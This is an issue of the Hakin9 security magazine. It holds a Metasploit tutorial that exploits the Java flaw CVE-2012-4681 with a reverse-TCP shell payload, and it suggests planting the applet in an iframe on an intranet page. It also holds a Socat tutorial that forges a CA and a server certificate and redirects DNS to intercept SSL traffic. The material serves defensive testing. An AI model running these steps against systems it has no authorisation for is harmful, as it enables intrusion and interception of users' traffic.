Atola Insight

That's all you need for data recovery.

Atola Technology offers Atola Insight - the only data recovery device that covers the entire data recovery process: in-depth HDD diagnostics, firmware recovery, HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool.

This product is the best choice for seasoned professionals as well as start-up data recovery companies.

Emphasized features at a glance:

• Automatic in-depth diagnostic of all hard drive components
• Automatic firmware recovery and ATA password removal
• Very fast imaging of damaged drives
• Imaging by heads
• Case management
• Real time current monitor
• Firmware area backup system
• Serial port and power control
• Write protection switch

Visit atola.com for details
DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.



Dear Hakin9 Readers,

This month we publish Hakin9 OPEN for the first time. Please have a look at this new-born issue, which we want to be a free-of-charge periodical supporting Hakin9, Hakin9 Extra, Hakin9 OnDemand and Hakin9 Exploiting Software. The idea behind this additional issue is to present how wide the scope of practical knowledge from the IT security field covered in Hakin9 issues is. We want to show the advantages of reading them to those who are not our regular readers yet.

Inside this issue you will find the best articles on leading topics included in the forthcoming Hakin9 magazines. We have prepared a set of interesting articles provided by experts.

Shane R. Spencer, a specialist in IT administration and programming, writes about the usage of Socat and Wireshark for practical SSL protocol reverse engineering.

Justin C. Klein Keane, an information security specialist working at the University of Pennsylvania, describes how to use Metasploit for security defense.

Stefano Braghin shows how to build a framework for organization-oriented social networking.

Mark Painter, HP expert, writes about secure data transmission standards.

Ewa Duranc, Hakin9 Editor, will introduce you to Aseem Jakhar, the Founder of the Nullcon Security Conference, in an interview concerning the upcoming event.

The Hakin9 OPEN editorial team would like to give special thanks to the authors, betatesters and proofreaders.

We hope that you will enjoy reading the issue!

Hakin9 Team
HAKIN9

How to Use Metasploit for Security Defense? 08
by Justin C. Klein Keane

In the article the author shows that simulating an attack is a great way to expose vulnerabilities in your networks, but it's also a good way to test defensive countermeasures. Using a tool like Metasploit, defenders can test the value of defenses and deploy them with confidence. It will also allow defenders to speak about the likelihood of specific types of attacks penetrating defenses and compromising systems. Using Metasploit, defenders can "footprint" attacks and identify patterns that result from various classes of attacks, and tune not only their prevention countermeasures, but also their detection measures.

How to Use Socat and Wireshark for Practical SSL Protocol Reverse Engineering? 14
by Shane R. Spencer

This article focuses on using an SSL MITM proxy to reverse engineer a simple web service. The aim of doing so is to create your own client that can interact with a database behind an unpublished API. The software used will be based on the popular Open Source Software Socat as well as the widely recognized Wireshark. Both are available on most operating systems.

How to Build a Framework for Organization-Oriented Social Networking? 20
by Stefano Braghin

In this article we present PriSM, a framework specifically designed and implemented to bring the social network communication experience to the workplace. This is achieved by realizing a simple, secure and scalable platform which eases both the access control policy management as well as its enforcement in a decentralized and delegated fashion, allowing flexible yet controlled intra- as well as inter-organizational interactions.

Mobile Applications: Are you Prepared to Carry the Risk? 36
by Mark Painter, Hewlett-Packard Expert

Secure data transmission standards should be included as part of any application's requirements, especially if an application is being developed by a third party. The same goes for secure data storage and application logging. Reasonable inter-application communication exposure and permissions in application requirements should be stringently defined.

HAKIN9 EXTRA

How has the Real Cloud Evolved? 40
by Eddie Mize

I deeply suspected this since the concept of the "Cloud" became a viable offering, but the last couple of years have allowed me to see specific vulnerabilities in the real world and also gain some understanding of how they came about. Let me describe the evolution of a real "Cloud" provider environment. This environment included over 7,000 servers (bare metal and virtual) and was spread over 15 data centers.

HAKIN9 ONDEMAND

Interview with Aseem Jakhar, the Founder of nullcon Security Conference 44
by Hakin9 Team

Nullcon was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero day vulnerabilities and unknown threats. Their motto, "The next security thing", drives the objective of the conference, i.e. to discuss and showcase the future of information security and the next generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why the current technology is not sufficient and what should be the focus for the coming years pertaining to information security.
Hakin9 in 2012.

Accomplishments and statistics

Dear Hakin9 Readers,

2012 is nearly over. As usual, we have prepared something extraordinary for you. Some of you are new to our magazine and some are with us for months, even years. The end of the world approaches rapidly, so we decided that in exchange for your immeasurable support, you deserve to know the best kept secret of the globe - how Hakin9 works. Let us tell you our story, which should give you an insight into what we have been through this year.

As for the first order of business, we shall discuss the statistics. This should help you visi[...] at the magazine and understand the process we have to undergo in order to meet [...]

Run, Forest, run!

This year, we have published a total of 49 Hakin9 issues - 3442 pages.

Although most of you are familiar with mathematics, I suppose you may not imagine the extent of [...] we are dealing with here. Let us portray it to you. 3442 pages equals 204.73 m² of paper - this means that our articles could cover the floors of a large house. Can you imagine tripping over your child's [...] and accidentally discovering the way to hack your BIOS password? Or fainting and waking up to learn how to solve the "attribution problem"? In such a situation, the popular proverb "you learn something new every day" takes on a completely new meaning.

Let us weigh in on another measure. All the issues we published in 2012 put on the scale would show 137.12 pounds (51.18 kilos) - this is how heavy (or light) your average girlfriend would be. Have you ever thought of what would be the best thing in the world? We believe that a partner made of your passion would have significant chances of winning such a contest.

Although, we are sorry, but we have to shatter your dreams - Hakin9 nowadays is released only digitally. Unfortunately, you will have to find a real girlfriend :-). Nevertheless, we consider that fact our advantage. Even though you will not be able to wear Hakin9 on your soles, you can put your finger on it - on your smartphone or Kindle. This way, you can kill the time in long lines, during a layover at the airport, or in the mall while your wife is shopping for new shoes, at the same time learning many useful things.

Moreover, the path we chose helps to restore the environment. Throughout the year, our subscriber base grew 10 times - from slightly over 200 to 2000 readers. If all these pages were to be published in print, we would have to use almost 500 trees, which equals over 27,600 ft². Thanks to you, we have saved an impressive park!

Although we also miss the paper version of Hakin9, we have to greatly thank you for your interest in our digital magazines. You have helped to make the world a better place. We have to cherish it, for it is the only one we have at the moment. You deserve a loud round of applause for not being discouraged. The forests are a bit safer now thanks to you.

Power in numbers

As you are well aware, we are the number 1 IT security publication in the world. But to achieve such a status, it takes much more than this dignified single digit.

This year, in order to give you the materials you had a chance to read, we were working over 250 days, which equals more than 2000 hours for each employee. These few pages you go through in a couple of hours on a monthly basis have cost our experts almost 1000 weeks to prepare. Our beta testers and proofreaders have spent a similar amount of time making sure that you will enjoy your reading. Finally, our graphic designer devoted 3000 hours to designing the layout to appeal to your eyes. As you can see, a great amount of our lives was sacrificed to satisfying your needs.

During our fight for your right to hack better, we have also suffered losses. As you may guess, our main weapon is the computer. Just like in every war, the equipment is exploited heavily and put through extreme situations. You may be sure that we have pushed our PCs to their absolute limits. We have overheated our processors, filled the hard drives, overused internet connection transfers, etc. Most of our inventory has survived, although we cannot deny there were casualties - 10 computer mice have passed away during the harsh battles for knowledge. Let them rest in peace. Finally, our battle cry - "HACKING" - has been used over 5 million times. Some of us (including one of the authors of this article) suffered severe throat damage due to that fact.

Where would we be...

...if it wasn't for you? Probably we would grow beards and stand in long queues for our welfare check. Or maybe in the psychiatrists' offices whining about how we are useless. As long as we have our precious readers, we have a purpose. We owe you a huge THANK YOU. Everything we do, we do with you in our minds. We are grateful for every comment and opinion, either positive or negative. We have analyzed every sign of your discontent and every time we were even more motivated to increase the quality of our product. Every word from you lets us improve Hakin9 and brings us closer to the ideal shape of our magazine, or shall we say - your magazine. Thank you Hakin9 fans for your invaluable support and contribution. We owe you one.
How to Use Metasploit for Security Defense

If you've ever taken any training about penetration testing, or read almost any book or online article about the trade, you've heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task.



Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult. In many cases, researchers would release "proof of concept" exploit code that demonstrated a vulnerability, but did little more than launch the calc.exe program or other harmless activity. Furthermore, exploit code was often unreliable and required specific environments to build and compile. Thus, a vulnerability tester had to fingerprint systems, hunt across the internet and mailing lists for exploit code, create systems upon which to build and compile the code, then execute the code against target systems, and, with fingers crossed and bated breath, hope that the exploit worked.

The situation was frustrating, and untenable for a professional class of penetration testers who wanted reliable, easy to access exploit code to use professionally. Thus, Metasploit was born, as a framework to support standardized, tested exploit code. With Metasploit, exploit code could be packaged into "modules" in order to ensure they would work with the framework. Users of Metasploit only needed to ensure that Metasploit itself would run on a system, and exploits could be crafted for Metasploit, rather than having to rely on a testing lab full of machines of various architectures running several different operating systems in order to compile exploit code successfully. With Metasploit, testers could turn to a trusted tool and have confidence that modules included in the framework would work as advertised.



Metasploit for Defense

Metasploit has long since become the industry standard for offensive security and penetration testing. It is robust, flexible, and reliable, all of which make it a favorite among practitioners. Using Metasploit for defensive tasks may seem a little counterintuitive. Why would a network security engineer, say, be interested in an attack tool? There are many good answers to these queries. In this article I'll propose a rather timely example. Recently, Oracle's Java implementation was demonstrated to have a vulnerability that allowed anyone using a web browser to be compromised, remotely, simply by viewing a web page (CVE-2012-4681). This vulnerability allowed a maliciously crafted Java applet to compromise the Java Virtual Machine (JVM) on client machines, and execute arbitrary code as the currently logged on user. This was extremely damaging, because at the time the vulnerability became public, there was no supported fix from Oracle (the flaw was a 0-day, that is, a vulnerability for which no fix exists). This meant that any attacker leveraging the exploit could take over a victim machine and there was little defenders could do. In short order a Metasploit module was released.

As expected, there was much wailing and gnashing of teeth amongst network security defense professionals. When new vulnerabilities become public, the first thing organizations usually want to measure is their own level of exposure. Without specific detail it is difficult to justify the expense to remediate a problem. For instance, with the Java vulnerability, would it be worth the effort to craft intrusion detection alerts so that security staff were notified whenever a malicious Java applet was accessed, and if so, how would one determine how to write such a rule? Similarly, an organization might want to decide if they needed to turn off Java in all web browsers, and how that effort would measure against the potential risk.

Knowing the level of exposure and being able to concretely address concerns from management about a particular risk is an extremely difficult task for most defenders. Tools like Metasploit allow defenders to test exploits against their current system builds and answer these questions. A tool that allows defenders to actively gauge the effectiveness of countermeasures, the likelihood of exploit success, and the impact of such an exploit can help organizations craft measured, effective responses to vulnerability announcements like CVE-2012-4681.

Getting Started with Metasploit

Metasploit is a rather large and complex software program. It contains a number of tools and can be extremely intimidating for a beginner. It is not a tool that invites the casual user to develop familiarity. Rather, operators must understand Metasploit, its proper use, capabilities, and limitations, in order to get maximum value from the framework.

Getting started with Metasploit begins with downloading the latest version of the framework from Metasploit.com. There are two versions available, a free and a commercial version. Metasploit was completely free and open source until it was acquired by Rapid7, which then began offering a commercial version of the tool with extended capabilities and support. The free version remains the flagship, however, so there is no need to fear that using the free version will somehow hamper testing capabilities. The commercial version includes extra features for enterprises, so if you plan to use Metasploit on any sort of regular basis it is worth investigating.

Architecture

Metasploit is a complete framework, programmed in Ruby. Don't worry if you don't know how to program, or how to code in Ruby; the framework takes care of most of the common tasks most testers would be interested in.

Metasploit includes a number of additional tools in addition to the framework itself. You'll notice if you look in the install directory that there are complete versions of Java, Ruby, and PostgreSQL as well as Metasploit. These technologies support the framework and the various tools that come with Metasploit. Most of this should occur behind the scenes.

Installation

The Metasploit download is fairly straightforward. You can install Metasploit on Windows or Linux, or even use it in a pre-configured environment such as the BackTrack Linux distribution. For the purposes of this article we'll explore installation of Metasploit on a Windows XP system as a sort of lowest common denominator. However, using the tools in Metasploit that require integration with separate technologies (such as Java or PostgreSQL) may be easier with a preconfigured distribution.

To get started, point a browser at the Metasploit website (http://www.metasploit.com), navigate to the download section, and choose the version of Metasploit that fits your operating system (Figure 1).

Once the download is complete, be aware that you may get a number of warnings about Metasploit from your browser, operating system, and/or anti-virus software. Metasploit contains exploit code; by definition it is hostile, so your machine is right to identify this code as malicious. If you don't get any warnings, that is likely an indication that your computer's defenses may need a little attention (Figure 2).

Open the downloaded installer and run it on your machine. You may need to add an exception to your anti-virus software to exclude the Metasploit installation directory (C:\metasploit) in order for the install to complete. Similarly, you may get warnings that your machine's firewall could interfere with the operation of Metasploit. This is mainly due to the fact that many Metasploit payloads require that targets be able to connect back to your machine. Careful manipulation of your firewall to allow these ports is a wiser approach than disabling the firewall entirely, but be aware that this could cause issues. Once you have stepped through any warnings, begin the installer. Installation will require you to accept the license agreement, decide on an installation directory, choose an SSL port on which to serve Metasploit, decide on a name for the server and the server's certificate validation timespan. In most cases the default options for the installation are sufficient (Figure 3).

Figure 1. The Metasploit download site

Figure 2. Installation warning of exploits. The installer states: "This product is not compatible with common anti-virus solutions. Before continuing, please disable any installed anti-virus software or add an exclusion for the Metasploit installation directory. Failure to do so can lead to a corrupt installation and the malfunctioning of certain exploit modules."

Up and Running

There are several common ways to interact with the framework, all included in the install. The first is the console, which you can find under Start -> Metasploit -> Metasploit Console. This is the command line tool that you use to interact with the framework. The other common ways to connect are Armitage, which is a Java based GUI tool for using Metasploit, MSFGUI, and the Web UI. I have found that the console is by far the most direct, efficient, and reliable way to interact with Metasploit. In fact, some exploits that seem to work perfectly in the console have not functioned properly when started from the Web UI (such as the Java CVE-2012-4681 exploit) (Figure 4).

Figure 3. Metasploit installing

Figure 4. The Metasploit console:

[*] Please wait while the Metasploit Pro Console initializes
[*] Starting Metasploit Console...
[*] Successfully loaded plugin: pro
msf >

Once installed, Metasploit can be utilized in a number of ways. The most direct way to interact with Metasploit is via the command line, using the msfconsole. The console can be intimidating for novice users, but it exposes all of the power and capabilities of the Metasploit framework, so it is worth exploring in order to develop proficiency.

Getting Started

Getting started with the Metasploit Console can be somewhat perplexing. There is no easy way to navigate other than by using text based commands, and some commands are extremely clunky (for instance, some commands might produce a large volume of output that will flash by the screen, but the scroll history of the Console won't let you scroll up and actually see all the output). Despite these shortcomings, the full power and flexibility of Metasploit is available from the Console, so developing proficiency is time well spent. It is worth being aware that this may take some investment, however, to avoid initial frustration and fatigue with the tool.

Before you get started with the Console it is important to make sure that you update Metasploit so that you're using the latest version of the framework with the newest exploits. The installer downloaded from the website may not include recently released exploit modules. The update program can be found under Start -> Metasploit -> Framework -> Framework Update. This will open a console window and check for the newest version of the software (Figure 5).

Figure 5. Metasploit update downloads new modules

Once you're sure your version of the framework is up to date you can get started with the Console. The first command that you should learn in the Console is the 'help' command. This will list out all of the commands that you can use in the console. There are quite a number of commands. To get more information about a command you can type 'help' followed by the command you're interested in (such as 'help banner') (Figure 6).

To find exploits you'll need to utilize the 'search' command. To list all the exploit modules in Metasploit you can simply type 'show', but as mentioned before, this is of little use since the Console will display far too many modules for the interface to actually display. Instead, try using the 'search' command and searching for Java vulnerabilities by typing 'search java'. You'll notice that even just searching for this one phrase lists quite a number of results.

When searching for Java modules one also quickly notices that there are different types of modules listed: auxiliary, exploit, and payload. We'll be interested in the exploit modules in order to craft a malicious Java applet, and the payload modules to craft our malware payload that will execute whenever a vulnerable machine accesses the applet. To search for exploits specific to the vulnerability we want to test, type 'search cve:2012-4681'. Alternatively you can use the Metasploit website to search for exploits and find useful descriptions, including usage documentation, at http://www.metasploit.com/modules (Figure 7).
Crafting the Exploit

To begin building our exploit we'll have to tell Metasploit which module to use. To do this simply type 'use' followed by the name of the exploit (remember, you can type 'help use' to get an example of how to execute the 'use' command). In this case we'll type in 'use exploit/multi/browser/java_jre17_exec' in order to start using the exploit. You'll notice that the Console prompt changes so that you know which exploit you're using (Figure 8).

Now that we're using the desired exploit we have to provide instructions for Metasploit to craft our malicious payload. So far Metasploit knows we want to use the Java 1.7 vulnerability to craft an exploit, but once Metasploit takes advantage of the vulnerability it needs to understand what instructions we want to execute on the victim computer. For this example, we will create a payload that spawns a reverse shell. A reverse shell is a command prompt that we can access locally, but which actually executes commands on the target system. We can choose from a number of payloads, which we can explore using the 'show payloads' command.

To select the payload, type in 'set PAYLOAD java/shell/reverse_tcp' and hit enter. This will set up a payload in the applet that will execute and "shovel" a shell over TCP back to our machine. In order for the payload to work we need to tell Metasploit the IP address of the machine to connect back to. To do this type in 'set LHOST [ip_address]' where [ip_address] is the IP of your machine. Once this information is entered we're ready to begin. Simply type in 'exploit' to start the exploit (which spawns a web server listening at a specific URL detailed in the Console output that will deliver our payload when accessed) (Figure 9).

Figure 6. Metasploit Console help command

Figure 7. Using the Metasploit Console search command

Figure 8. Metasploit Console prompt changes to show the exploit:

msf > use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) >

Testing the Exploit

Setting up a test machine may be a little tricky. You'll have to ensure that Java is installed on the machine, but you need an older, vulnerable version. Older versions of Java are available from Oracle, for testing purposes. You can find older versions at http://www.oracle.com/technetwork/java/archive-139210.html or generally by looking for Java Downloads and then following the link to Previous Releases. Using Java 1.7.0_6 should be sufficient. To determine the version of Java you have installed, type 'java -version' at the command line.

In your test machine, pull up a web browser and type in the address of the Metasploit server. This is a somewhat contrived way to access the malicious applet. In the wild, applets such as this are generally included in hidden iframe tags that are inserted into otherwise innocuous web pages. The exploit can be further hidden by obfuscating the reference using JavaScript and functions that encode and decode data, so that anyone observing the HTML source code of an infected web page would see nothing but gibberish code that web browsers can easily decode and execute but which is more difficult for human eyes to parse (Figure 10).

Figure 9. Metasploit exploit started. The console shows the tail of the 'show payloads' listing (java/shell/bind_tcp - Bind TCP Stager, java/shell/reverse_tcp - Reverse TCP Stager, java/shell_reverse_tcp - Reverse TCP Inline), followed by:

msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf exploit(java_jre17_exec) > set LHOST 10.10.0.50
LHOST => 10.10.0.50
msf exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.0.50:4444
[*] Using URL: http://0.0.0.0:8080/8f17jPC
[*] Local IP: http://10.0.2.15:8080/8f17jPC
[*] Server started.

Calling the URL from your test machine should only result in a blank screen (or in this case a warning that the Java plugin is out of date, which, kudos to Oracle, should nag most users into updating). The only indication that the exploit has been successful will appear in the Metasploit Console (Figure 11).

Once you see the indication that the stage has been sent you can check to see if a session is available. To do this, in the Console, hit enter to get back to a prompt. Next, type in 'sessions' to see the active sessions that are available. You should see an indication that the reverse shell is up and listening. Note the 'id' of the session, as you need this information to connect to the session (Figure 12).

Figure 10. Vulnerable machine being exploited via malicious Java applet

Figure 11. Metasploit console shows the target has been exploited

Figure 12. Metasploit shows the actively exploited machines as sessions

Once a session is established we can interact with the session by typing in 'sessions -i [id]' where [id] is the id number noted previously. There are a number of session commands that you can explore using the 'help sessions' command. As soon as you enter interactive mode you'll notice the command prompt will change to the familiar MS-DOS prompt and you can type commands as though you were logged into the target computer (Figure 13).

Production Use

Establishing a proof of concept is useful in confirming that your Metasploit exploit will actually work. Putting it into practice in the wild is the next step. You'll want to have Metasploit installed on a machine that is accessible in your environment, and then start up the exploit so it is serving from the server. Next, placing a reference to the Metasploit applet in an iFrame on an intranet site or other page that you know users in your environment will access will allow you to test infection rates. Checking the console periodically will allow you to see the IP addresses of users who are vulnerable to the exploit.

A better plan is to simply observe what configurations fall victim to the Metasploit exploit and what configurations do not, then adjust your production systems to protect them. Many antivirus products will detect the Metasploit payload and stop it, which is reassuring in that you can be confident that your AV solution will detect Metasploit attacks. A better solution is a configuration that denies Java from actually attempting to execute the malicious applet. For instance, whitelisting sites upon which Java can execute can greatly limit scope.



Conclusions

The ability to test exploits against systems in your environment is a tremendous advantage. Using Metasploit you can easily, and extremely accurately, gauge your exposure to compromise. The Java 1.7 vulnerability (CVE-2012-4681) is just one example. Metasploit includes hundreds of modules, including some that will test misconfiguration in addition to vulnerabilities. There are modules that will perform brute force attacks to do things like test the strength of passwords on your SQL servers, in addition to target enumeration modules that will perform ping sweeps, find hosts on your network vulnerable to idle scanning, and more.

Hopefully this brief tutorial has convinced you that Metasploit has value to system defenders as well as penetration testers. Simulating an attack is a great way to expose vulnerabilities in your networks, but it's also a good way to test defensive countermeasures. Using a tool like Metasploit, defenders can test the value of defenses and deploy them with confidence. It will also allow defenders to speak about the likelihood of specific types of attacks penetrating defenses and compromising systems. Additionally, using Metasploit, defenders can "footprint" attacks and identify patterns that result from various classes of attacks, and tune not only their prevention countermeasures, but also their detection measures (could your network spot a reverse shell spawning from one of the internal workstations?). For all of these reasons Metasploit should definitely be a part of any internal security team's toolkit.
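The detection question raised above can be exercised on a log. The following is an added example, not from the article, that scores constructed Zeek-style connection records for reverse-shell indicators; the workstation subnet, port allowlist and thresholds are assumptions a real deployment would tune.

```python
# Added example (not part of the article): a detector for the question the
# conclusion raises, whether the network would notice a reverse shell spawned
# from an internal workstation. It scores constructed Zeek-style connection
# records (tab-separated: ts, src, dst, dport, duration, orig_bytes, resp_bytes).
# The subnet, port allowlist and thresholds are assumptions, not the article's.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

WORKSTATION_NET = ip_network("10.1.0.0/16")   # assumed workstation range
ALLOWED_PORTS = {80, 443, 53}                 # assumed normal client ports
LONG_SESSION_SECONDS = 300.0                  # a web request never stays open this long


@dataclass
class Conn:
    ts: float
    src: str
    dst: str
    dport: int
    duration: float
    orig_bytes: int   # bytes sent by the originator (the workstation)
    resp_bytes: int   # bytes sent back by the responder


def parse_conn_line(line: str) -> Conn:
    ts, src, dst, dport, dur, ob, rb = line.rstrip("\n").split("\t")
    return Conn(float(ts), src, dst, int(dport), float(dur), int(ob), int(rb))


def reverse_shell_score(c: Conn) -> int:
    """Return how many reverse-shell indicators the connection shows (0-3).

    Only connections started by a workstation are scored: a reverse shell is
    the workstation calling out, not something connecting in to it.
    """
    if ip_address(c.src) not in WORKSTATION_NET:
        return 0
    score = 0
    if c.dport not in ALLOWED_PORTS:
        score += 1   # unusual destination port
    if c.duration >= LONG_SESSION_SECONDS:
        score += 1   # interactive session kept open for minutes
    if c.orig_bytes > c.resp_bytes:
        score += 1   # workstation pushes more than it pulls: command output
                     # goes out, short typed commands come in
    return score


def find_reverse_shell_candidates(lines, min_score: int = 2):
    """Return the parsed connections whose score reaches min_score."""
    conns = (parse_conn_line(line) for line in lines if line.strip())
    return [c for c in conns if reverse_shell_score(c) >= min_score]


# Constructed sample records (not real traffic).
SAMPLE_LOG = [
    "1346227200.0\t10.1.0.55\t208.93.0.128\t443\t2.3\t1200\t54000",    # normal HTTPS fetch
    "1346227210.0\t10.1.0.55\t10.1.0.1\t4444\t1850.0\t48000\t900",    # shell back to a lab box
    "1346227220.0\t10.1.0.77\t93.184.216.34\t8080\t1.1\t500\t700",    # odd port, but short and pull-shaped
    "1346227230.0\t208.93.0.128\t10.1.0.9\t4444\t2000.0\t9000\t100",  # inbound: not scored
]

if __name__ == "__main__":
    for c in find_reverse_shell_candidates(SAMPLE_LOG):
        print(f"{c.src} -> {c.dst}:{c.dport} score={reverse_shell_score(c)}")
```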



Figure 13. Using Metasploit to type commands on the exploited target
How to Use Socat and Wireshark for Practical SSL Protocol Reverse Engineering?

Secure Socket Layer (SSL) Man-In-the-Middle (MITM) proxies have two very specific purposes. The first is to allow a client with one set of keys to communicate with a service that has a different set of keys without either side knowing about it. This is typically seen as a MITM attack but can be used for productive ends as well. The second is to view the unencrypted data for security, educational, and reverse engineering purposes.



For instance, a system administrator could set up a proxy to allow SSL clients that don't support more modern SSL methods, or even SSL at all, to get access to services securely. Typically, this involves having the proxy set up behind your firewall so that unencrypted content stays within the confines of your local area.

Being able to analyze the unencrypted data is very important to security auditors as well. A very large percentage of developers feel their services are adequately protected since SSL is being used between the client and the server. This includes the idea that if the SSL client is custom closed source software then the protocol will be unbreakable and therefore immune to tampering. If you're investing your company's funds using a service that could easily be subject to tampering then you may end up with a nasty surprise: lost funds perhaps, or possibly having your account information publicly available. This article focuses on using an SSL MITM proxy to reverse engineer a simple web service. The purpose of doing so will be to create your own client that can interact with a database behind an unpublished API. The software used will be based on the popular open source software Socat as well as the widely recognized Wireshark. Both are available on most operating systems.

Let's Get Started!

We will be reverse engineering a LiveJournal client called Logjam which supports SSL connections to the LiveJournal API servers. Since this article is purely educational we don't mind getting some experience using the LiveJournal API, which is already public, and Logjam, which is a free and open source project.

Prerequisites

• Install Socat - Multipurpose relay for bidirectional data transfer: http://www.dest-unreach.org/socat/

• Install Wireshark - Network traffic analyzer: http://www.wireshark.org/

• Install OpenSSL - Secure Socket Layer (SSL) binary and related cryptographic tools: http://www.openssl.org/

• Install TinyCA - Simple graphical program for certification authority management: http://tinyca.sm-zone.net/

• Install Logjam - Client for LiveJournal-based sites: http://andy-shev.github.com/LogJam/

Generating a False SSL Certificate Authority (CA) and Server Certificate

The API domain name for LiveJournal is simply www.livejournal.com and any SSL compliant client software will require the server certificate to match the domain when it initially connects to the SSL port of the server.

An SSL CA signs SSL certificates and is nothing more than a set of certificate files that can be used by tools like OpenSSL to sign newly generated certificates via a certificate signing request (CSR) that is generated while creating new server certificates. The client simply needs to trust the certificate authority public key and subsequently the client will trust all server certificates signed by the certificate authority private key.

Generating a certificate authority

Run tinyca2 for the first time and a certificate authority generation screen will appear to get you started (Figure 1).

It doesn't matter what you put here if you don't plan on keeping this certificate authority information for very long. The target server at LiveJournal.com will never see the keys you are generating and they will stay completely isolated to your testing environment. Be sure to remember the password since it will be required for signing keys later on.

Select Export CA from the CA tab and save a PEM version of the public CA certificate to a new file of your choosing.

Generating a server certificate

Click on the Requests tab in TinyCA and then the New button that will help us create a new certificate signing request and private server key (Figure 2).

The common name must be www.livejournal.com. The password can be anything and we will be removing it when we export the key for use.



Figure 1. TinyCA new certificate authority window (Create a new CA: Name "Yoyodyne", Common Name "Yoyodyne Propulsion Systems", Country "US", Locality "San Narciso", Organization "Yoyodyne", Organizational Unit "Information Technology", valid for 3650 days, 4096-bit key, SHA-1 digest)



Under the Requests tab there is now a certificate named www.livejournal.com that needs to be signed. Right click and select Sign Request and then Sign Request Server. Use the default values to sign the request.

Now there will be a new key under the Key tab. Right click on it and select Export Key and you'll be presented a new dialog (Figure 3).

As seen in the figure you want to select PEM (Key) as well as Without Passphrase (PEM/PKCS#12) and Include Certificate (PEM). Doing so will export a PEM certificate file that contains a section for the certificate key as well as the certificate itself. The PEM standard allows us to store multiple keys in a single file.

Congratulations, you now have a perfectly valid key for https://www.livejournal.com as long as the web server running the site is under your own control and uses the server key you've generated. Trusting the key is the tricky part.

Allow Logjam to trust the certificate authority

So we have to dig in a bit to understand which SSL certificate trust database Logjam will be using. Most Linux based GTK and console programs rely on OpenSSL, which has its own certificate authority database that is very easy to add a new certificate to.

In Debian GNU/Linux the following will install your new Yoyodyne CA certificate system wide: Listing 1.

Now Logjam as well as programs such as wget, w3m, and most scripting languages will trust all keys signed by your new CA.

Using Socat to Proxy the Stream and Hijacking your own DNS

Socat is basically a swiss army knife for communication streams. With it you can proxy between protocols. This includes becoming an SSL aware server and proxying streams as an SSL aware client to another SSL aware server.



Figure 2. TinyCA new certificate request window (Common Name www.livejournal.com, 4096-bit RSA key, SHA-1 digest)

Figure 3. TinyCA private key export window (Export Format: PEM (Key); Without Passphrase (PEM/PKCS#12): Yes; Include Certificate (PEM): Yes)
Set up your system and start up socat

Since we should aim for transparency we will need to intercept DNS requests for www.livejournal.com as well, so that our locally operated proxy running on port 443 on IP 127.0.2.1 is in the loop.

First, we will need to know the original IP of www.livejournal.com:

spencersr@bigboote:~$ nslookup www.livejournal.com 8.8.8.8
Server:         8.8.8.8
Address:        8.8.8.8#53

Non-authoritative answer:
Name:   www.livejournal.com
Address: 208.93.0.128

Bingo! Now add the following line to /etc/hosts near the other IPv4 records:



127.0.2.1 www.livejournal.com

Now let's do a test run by listening on port 443 (HTTPS) and forwarding to port 443 (HTTPS) of the real www.livejournal.com:

spencersr@bigboote:~$ sudo socat -vvv \
    OPENSSL-LISTEN:443,verify=0,fork,key=www.livejournal.com-key.pem,certificate=www.livejournal.com-key.pem,cafile=Yoyodyne-cacert.pem \
    OPENSSL:208.93.0.128:443,verify=0,fork

Simple enough. Browsing to https://www.livejournal.com with w3m and wget should work successfully now and a stream of random encrypted information will be printed by socat.

Listing 1. Install Yoyodyne CA certificate

spencersr@bigboote:~$ sudo mkdir /usr/share/ca-certificates/custom
spencersr@bigboote:~$ sudo cp Yoyodyne-cacert.pem \
    /usr/share/ca-certificates/custom/Yoyodyne-cacert.crt
spencersr@bigboote:~$ sudo chmod a+rw \
    /usr/share/ca-certificates/custom/Yoyodyne-cacert.crt
spencersr@bigboote:~$ sudo dpkg-reconfigure -plow ca-certificates -f readline
ca-certificates configuration

Trust new certificates from certificate authorities? 1

This package installs common CA (Certificate Authority) certificates in /usr/share/ca-certificates.
Please select the certificate authorities you trust so that their certificates are installed into
/etc/ssl/certs. They will be compiled into a single /etc/ssl/certs/ca-certificates.crt file.

  cacert.org/cacert.org.crt
  custom/Yoyodyne-cacert.crt
  debconf.org/ca.crt

  150. mozilla/XRamp_Global_CA_Root.crt
  151. spi-inc.org/spi-ca-2003.crt
  152. spi-inc.org/spi-cacert-2008.crt

(Enter the items you want to select, separated by spaces.)

Certificates to activate: 2

Updating certificates in /etc/ssl/certs... added, removed; done.
Running hooks in /etc/ca-certificates/update.d....
Adding debian:Yoyodyne-cacert.pem
done.
Chaining two socat instances together with an unencrypted session in the middle

So far so good! Now we need to have socat connecting to another socat using the standard TCP4 protocol in order to view the unencrypted data. This works by having one socat instance listening on port 443 (HTTPS) and then forwarding to another socat on port 8080 (HTTP) which then forwards on to port 443 (HTTPS) of the real www.livejournal.com.

Listing 2. Socat terminal

> 2012/08/29 00:10:27.527184 length=209 from=0 to=208
POST /interface/flat HTTP/1.1\r
Host: www.livejournal.com\r
Content-Type: application/x-www-form-urlencoded\r
User-Agent: http://logjam.danga.com; martine@danga.com\r
Connection: Keep-Alive\r
Content-Length: 23\r
\r
> 2012/08/29 00:10:27.566184 length=23 from=209 to=231
ver=1&mode=getchallenge< 2012/08/29 00:10:29.551570 length=437 from=0 to=436
HTTP/1.1 200 OK\r
Server: GoatProxy 1.0\r
Date: Wed, 29 Aug 2012 08:10:56 GMT\r
Content-Type: text/plain; charset=UTF-8\r
Connection: keep-alive\r
X-AWS-Id: ws25\r
Content-Length: \r
Accept-Ranges: bytes\r
X-Varnish: 904353035\r
Age: 0\r
X-VWS-Id: bill-varn21\r
X-Gateway: bill-swlb10\r
\r
auth_scheme
c0
challenge
c0:1346227200:656:60:xxxxxx:xxxxxxxxxxxxx
expire_time
1346227916
server_time
1346227856
success
OK
